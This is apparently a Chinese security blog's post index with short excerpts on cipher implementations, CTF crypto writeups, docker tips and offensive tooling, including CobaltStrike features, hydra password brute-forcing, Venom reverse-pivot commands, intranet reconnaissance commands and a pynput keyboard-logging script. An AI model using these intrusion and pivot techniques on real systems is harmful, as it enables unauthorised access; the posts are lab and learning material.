自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(79)
  • 收藏
  • 关注

原创 python简单实现Rc4算法

# 密钥编排函数def KSA(key): S = [] # 状态数组 T = [] # 临时数组 #初始化S和T for i in range(256): S.append(i) T.append(key[i % len(key)]) # print(S,T) #用T产生S的初始置换 j = 0 for i in range(256): j = (j + S[i]

2021-10-18 15:20:26 970

原创 CobaltStrike使用详解

CobaltStrikeCobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!CobaltStrike的

2021-09-28 22:50:06 2134 2

原创 python实现DES算法加解密

# 从文件中读取明文# 对明文进行字符转换成比特流 每64位分一组 最后不足的用0补足# 对每组的64位比特进行IP置换 分 L,R俩组# 对L,R进行16轮的Feistel变换# 使用IP-1(IP逆置换)函数将L,R合并为密文比特流# 最后将密文比特流转换成密文字符保存import reimport libnumimport osIP_table = [58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20,

2021-09-27 00:49:48 2592 1

原创 eNSP中网云不能识别网卡

第一步在电脑上把winpcap卸载掉WinPcap 卸载重新安装第二步在eNSP的安装路径下tools的文件夹下,重新安装winpcap

2021-09-26 10:20:25 1317

原创 windows、linux 命令行关闭进程

windows 下命令行关闭进程使用 进程名关闭taskkill /im test.exe /f使用 进程id 关闭taskkill /im PID /fLinux命令行关闭进程批量杀进程: ps -ef|grep 进程名|grep -v grep|cut -c 9-15|xargs kill -9显示10个消耗CPU最多的进程:ps aux |head -1 && ps aux |sort -rn +2 |head –10显示10个消耗存储空间最多的进程:p

2021-09-15 14:12:32 281

原创 python、C利用扩展欧几里得算法求乘法逆元 以及 实现仿射密码加解密

扩展欧几里得算法求乘法逆元扩展的欧几里德算法可用于求解a mod b的逆元,而逆元求解在RSA加密算法中是不可缺少的一步伪代码如下:def fangshe_reverse(a,b): X=[0,1] Y=[1,0] X.append(int(a)) Y.append(int(b)) def exgcd(X,Y): if Y[2] == 0: #pass print('gcd(a,b)= %d \n

2021-09-08 20:58:57 1469 4

原创 内网渗透-内网信息收集

收集本机信息手动收集信息1、查询网络配置信息ipconfig /all2、查询操作系统及软件信息查询操作系统和版本信息systeminfo | findstr /B /C:"OS Name" /C:"OS Version"systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"查看系统体系结构echo %PROCESSOR_ARCHITECTURE%查看安装的软件版本wmic命令wmic product get name,vers

2021-09-07 14:09:06 206

原创 ensp(错误代码40)解决virtualbox不兼容问题

由于virtualbox版本过高或过低导致不兼容问题启动AR设备之后,设备命令行无法接收输入,在长时间等待后一直输出“####”。启动AR/WLAN设备时,提示“…错误代码40…”。解决方法:如20h2版本win10将virtualbox降至5.2.44eNSP下载地址VirtualBox 5.2.44下载地址系统型号virtualbox型号windows20h25.2.44windows19095.1.26eNSP命令大全:https://blog.c

2021-08-30 22:36:05 8339 1

原创 hydra工具的使用 (暴力破解密码)及kali自带字典说明

简介kali自带hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码官网:http://www.thc.org/thc-hydra可支持破解密码类型:AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTP

2021-08-20 00:01:20 16360

原创 Venom工具的使用(内网渗透 多级代理)

在Moriarty Corp靶场下使用Venom工具穿透内网工具说明:https://github.com/Dliv3/Venom编译好的可执行文件:https://github.com/Dliv3/Venom/releasesadmin监听端口,agent发起连接:./admin_linux_x64 -lport 9999 # 攻击机开启监听./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接agent监

2021-08-19 23:24:50 3084

原创 vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)

文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结靶场环境攻击机:kali(192.168.1.100)目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24)这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo

2021-08-19 18:27:03 2257

原创 BMZCTF-crypto- writeup

BMZCTF -crypto- writeup文章目录BMZCTF -crypto- writeupSudoku&ViginereOok栅栏密码4进制2018 AFCTF Morse2018 HEBTUCTF 社会主义接班人栅栏中的baseeasy_baseCRC32 BOOM!2018 AFCTF 可怜的RSA (公钥、密文.enc)看键盘山东省大学生网络技术大赛-baby (低加密指数攻击)2018 AFCTF MagicNumeasy_rsa 分解模数nsmall_rsa 同 山东省

2021-08-14 13:13:00 2390

原创 kali获得windows的shell后乱码

输入 chcp 65001(转utf-8代码页)

2021-04-26 19:43:37 1958 2

原创 清除docker缓存 及 删除docker镜像文件

清除docker镜像缓存命令docker system prune --volumes该命令清除:所有停止的容器所有不被任何一个容器使用的网络所有不被任何一个容器使用的volume所有无实例的镜像删除docker镜像文件docker rmi <ip/容器名>-f, -force: 强制删除镜像,即便有容器引用该镜像;-no-prune: 不要删除未带标签的父镜像;...

2021-04-19 11:38:51 2989

原创 更新/升级Kali Linux 及 Kali Linux切换到ZSH作为默认Shell

更新/升级Kali Linux的说明如果您已经有现有的Kali Linux安装,请记住您可以随时进行快速更新:(kali㉿kali)-[~]$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list(kali㉿kali)-[~]$ sudo apt update && sudo apt -y full-upgrade(k

2021-04-18 11:44:06 2898

原创 python-pynput库用法 及 简单实现记录键盘

pynput软件包说明文档#测试pynput第三方库#控制鼠标import timefrom pynput.mouse import Button,Controller #导入控制鼠标模块#创建控制器对象mouse = Controller()'''#position属性返回一个元组(指针位置)#time.sleep(2)print("当前指针位置:{}".format(mouse.position))#设置指针位置(元组)mouse.position = (60,60)

2021-04-12 16:47:17 2605 2

原创 漏洞扫描–awvs&Nessus(docker)

docker命令:pull 拉取下载镜像docker pull leishianquan/awvs-nessus:v03启动docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v03需要注意的是访问Nessus需要进入容器启动Nessus 服务:查看容器Docker ps –a启动容器Docker start 容器id进入容器Docker exec –it 容器id /bin/bash启动ness

2021-04-11 10:18:19 1771 3

原创 python脚本在windows后台运行

LinuxPython脚本在Linux后台执行加个&就行了windows法一第一步:将Python脚本打包成exe可执行文件Pyinstaller教程第二步:打包成exe文件以后,cmd执行sc create MyPythonServer binPath = "exe文件路径"sc start MyPythonServer可能不能启动我们创建的服务,可以用NSSM工具法二这里主要借助nssm工具生成自定义windos服务nssm工具下载地址:http://nssm.cc

2021-04-10 21:14:21 2414

原创 ImportError: cannot import name ‘key‘ from ‘pynput.keyboard‘解决方法

ImportError: cannot import name ‘key’ from ‘pynput.keyboard’ (D:\Python 3.8\lib\site-packages\pynput\keyboard_init_.py)无法从中导入名称“key”pynput.键盘’from pynput.keyboard import key,Controller原因是因为key的k是大写的...

2021-04-06 19:08:12 1406

原创 Docker Desktop(WSL2)修改镜像存储位置(win10 修改docker镜像存储位置)

Docker Desktop(WSL2)修改镜像存储位置因为我使用的是WSL2的版本,所以docker desktop在安装的时候创建两个wsl子系统,使用命令wsl -l -v --all:docker-desktop是存放程序的,docker-desktop-data是存放镜像的,这两个wsl子系统都是默认放在系统盘的。现将这2个存储文件迁移至其他盘(比如:D:\system\wsl)的流程如下:1.导出wsl子系统镜像:wsl --export docker-desktop D:\syst

2021-04-01 23:15:42 3907 3

原创 渗透测试工具集合

转载自security-360.cn,觉得里面一些信息收集和git的工具挺不错的,可以看看。集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举,数据库漏洞扫描,弱口令或信息泄漏扫描,端口扫描,指纹识别以及其他大型扫描器或模块化扫描器。项目地址:https://github.com/We5ter/Scanners-Box子域名枚举扫描器或爆破工具https://github.com/lijiejie/subDomainsBrute(lijiejie开发的一款使用广泛的子域名爆破

2021-03-18 21:16:54 1186

原创 CTF中常见编码总结

前言对常见的编码进行总结并记录一些编解码的网站和工具常见编码1、ASCII编码可以分作三部分组成第一部分是:ASCII非打印控制字符第二部分是:ASCII打印字符;第三部分是:扩展ASCII打印字符在线转换器ASCII编码转换2、base64、32编码Base64是网络上最常见的用于传输8Bit字节码的编码方式之一 · 基于64个可打印字符来表示二进制数据的方法 · 3个字节可表示4个可打印字符 · 如果要编码的字节数不能被3整除:当最后剩余一个八位字节(一个byte)时

2021-03-16 20:43:29 5098

原创 CRC校验原理简述及python代码实现CRC检验误码

CRC循环原理简述要理解CRC的运算过程,先要了解模2运算,这是CRC编码中的运算规则。也就是说,模2运算就是对两个长度相同的二进制数进行异或运算(不进位借位的运算)。CRC的运算过程核心是模二除法,模2除法具有下列三个性质:1、当最后余数的位数小于除数位数时,除法停止。2、当被除数的位数小于除数位数时,则商数为0,被除数就是余数。3、只要被除数或部分余数的位数与除数一样多,且最高位为1,不管其他位是什么数,皆可商1。接下来给出一个简单的CRC编码的实例1、除数与被除数最高几位(与除数

2021-03-15 20:57:03 3088 2

原创 centos7图形界面用户无法登陆(修改环境变量/etc/profile)

问题描述:在安装软件的时候修改了etc/profile里环境变量,导致命令无法使用 并 重启无法登录。解决方法:在登录界面 alt +ctrl+f2进入命令模式,键入/usr/bin/sudo /usr/bin/vi /etc/profile光标移到 export PATH** (添加的错误行)连续按d两次删除该行。ESC > : > wq 保存退出最后键入 /sbin/reboot 重启系统即可...

2021-01-01 11:56:43 2580 2

原创 docker安装awvs13

安装Dockedocker中拉取下载镜像docker pull secfa/docker-awvs将docker的3443端口映射到物理机的 13443端口docker run -it -d -p 13443:3443 secfa/docker-awvs关闭防火墙或者开放13443端口 systemctl stop firewalld systemctl disable firewalld firewall-cmd --permanent --zone=public --ad

2020-12-29 22:49:56 954 1

原创 [RoarCTF2019]babyRSA-阶乘取模(威尔逊定理)

encodeimport sympyimport randomdef myGetPrime(): A= getPrime(513) print(A) B=A-random.randint(1e3,1e5) print(B) return sympy.nextPrime((B!)%A)p=myGetPrime()#A1=2185696345246163043734827843419143400006607675041902749385246351346986

2020-12-20 22:12:13 939

原创 [BJDCTF2020]easyrsa

encodefrom Crypto.Util.number import getPrime,bytes_to_longfrom sympy import Derivativefrom fractions import Fractionfrom secret import flagp=getPrime(1024)q=getPrime(1024)e=65537n=p*qz=Fraction(1,Derivative(arctan(p),p))-Fraction(1,Derivative(ar

2020-12-19 12:17:54 754 1

原创 [NCTF2019]babyRSA

encodefrom Crypto.Util.number import *from flag import flagdef nextPrime(n): n += 2 if n & 1 else 1 while not isPrime(n): n += 2 return np = getPrime(1024)q = nextPrime(p)n = p * qe = 0x10001d = inverse(e, (p-1) * (q-1))c

2020-12-19 11:08:39 900 5

原创 CTF 常用python库

gmpy2库import gmpy2gmpy2.mpz(x)#初始化一个大整数xgmpy2.mpfr(x)#初始化一个高精度浮点数xC = gmpy2.powmod(M,e,n)#幂取模,结果是 C = (M^e) mod nd = gmpy2.invert(e,n) # 求逆元,de = 1 mod ngmpy2.is_prime(n) # 判断n是不是素数gmpy2.gcd(a,b) # 欧几里得算法gmpy2.gcdext(a,b) # 扩展欧几里得算法gmpy2.i

2020-12-14 17:55:31 1772

原创 [GWCTF 2019]BabyRSA

import hashlibimport gmpy2import sympyfrom Crypto.Util.number import *# flag = 'GWHT{******}'# secret = '******'# assert(len(flag) == 38)# half = len(flag) / 2# flag1 = flag[:half]# flag2 = flag[half:]# secret_num = getPrime(1024) * bytes_to

2020-12-11 09:56:57 490

原创 [BJDCTF2020]RSA

题目给了c和e、同公钥(e,n)加密的密文、具有同q的公钥加密的密文思路:由同q的公钥,也就是n公用了素数q,通过gcd函数可以得到p,也就有p和q此时就差e就能解出题目,已知e的范围、相同公钥加密的密文可由_294c == pow(294,e,n)爆破e,脚本如下:import gmpy2from Crypto.Util.number import *# flag=open("flag","rb").read()# p=getPrime(1024)# q=getPrime(1024)#

2020-12-08 21:15:08 1435

原创 [HDCTF2019]bbbbbbrsa

题目给出e的取值范围 ,以及n和p、base32加密并倒序的c由n和p可得q,base32倒序解密得c只要爆破出e即可from base64 import b64encode as b32encodefrom base64 import b64decode as b32decodeimport gmpy2from Crypto.Util.number import *from binascii import a2b_hex,b2a_heximport random# flag = "**

2020-12-08 19:18:02 966 1

原创 [BJDCTF 2nd]rsa1

# [BJDCTF 2nd]rsa1import libnumfrom Crypto.Util.number import *import gmpy2e=9724343#p^2+q^2=2239294139633281123617185011681472474689536672742549210503731792886729754908012060746180678253482904480120579996537396428165992851032621330792976391092190654

2020-12-08 14:01:48 234 1

原创 Windows环境下安装Z3的Python3版

GitHub官方仓库地址:Z3Prover/z3: The Z3 Theorem Proverpip 安装pip install z3-solver使用微软官方构建好的DLL找到Z3的最新的release:Releases · Z3Prover/z3目前的最新版是Z3-4.8.9。下载win-x64.zip,然后解压注意:更换目录为你的目录...

2020-12-08 13:58:45 982

原创 [BUUCTF]这是什么——JSfuck

题目描述:小明是一个软件专业的高材生,但是老师布置的这次的作业似乎不怎么靠谱,因为他们老师以前是学物理的!喜欢乱七八糟命名文件,还喜欢奇奇怪怪的编码。你快帮小明看一下这题,小明准备好了一箱子辣条。 注意:得到的 flag 请包上 flag{} 提交题目给出了一个apk文件,我们转成txt文件发现形如[][(![]+[])[+[]]+([![]]+[][[]])[+!+的编码在网上找了一下发现是jsfuck编码:原作者介绍false => ![]true =>

2020-12-07 22:01:10 2381 1

原创 [BUUCTF]RSA5 - 低加密指数广播攻击

低加密广播攻击的特点:加密指数e非常小一份明文使用不同的模数n,相同的加密指数e进行多次加密可以拿到每一份加密后的密文和对应的模数n、加密指数e此题给出的e很小且不变,给出了不同的公钥和对应的密文,也就是用不同的公钥加密相同的密文解题思路:不同的模数n中可能存在相同的p或者说q求出不同n之间的最大公约数 gcd()得到p或q 可得d有私钥d就能得到明文解密脚本:import gmpy2import libnume = 65537n0 = 2047491889405177

2020-12-02 14:29:07 4865 4

原创 [BJDCTF 2nd]rsa0

由p+q 和 p-q 得到p、q即解题e = 8542621#p+q = 18698482532406728080093200418425971262677963202439233724484717456494477495046378570706985787085759844143101902099263556198278335359888324691870230945957720x1 = 186984825324067280800932004184259712626779632024392337.

2020-12-02 13:32:39 110

原创 2020祥云杯 crypto-more_calc

import gmpy2from Crypto.Util.number import *flag = b"flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"p = getStrongPrime(2048)for i in range(1, (p+1)//2): s += pow(i, p-2, p)s = s % pq = gmpy2.next_prime(s)n = p*qe = 0x10001c = pow(bytes_to_long(f

2020-11-30 19:42:40 392 1

原创 [BUUCTF]rsa2 低解密指数攻击

低解密指数攻击与低加密指数相同,低解密指数可以加快解密的过程,但是者也带来了安全问题。在RSA中d也称为解密指数,当d比较小的时候,e也就显得特别大了。适用情况:e过大或过小(一般e过大时使用)首先需要需要下载工具rsa-wiener-attack(附件里面的rsa工具中有):git clone https://github.com/pablocelayes/rsa-wiener-attack(注意,这里要将破解脚本和rsa-wiener-attack的py文件放在同一个目录下)python3

2020-11-20 21:58:45 4025 3

原创 [BUUCTF]达芬奇密码

分析发现斐波那契数列乱序,于是可以猜测flag可能也是神秘字符串得乱序,且两者得乱序规则是一样得,接着通过移位可以得到flag字符串a = "0 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393 196418 317811 514229 832040 1346269 2178309"b = "0 233 3 2584 1346269 144 5 196

2020-11-20 17:29:56 2121

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除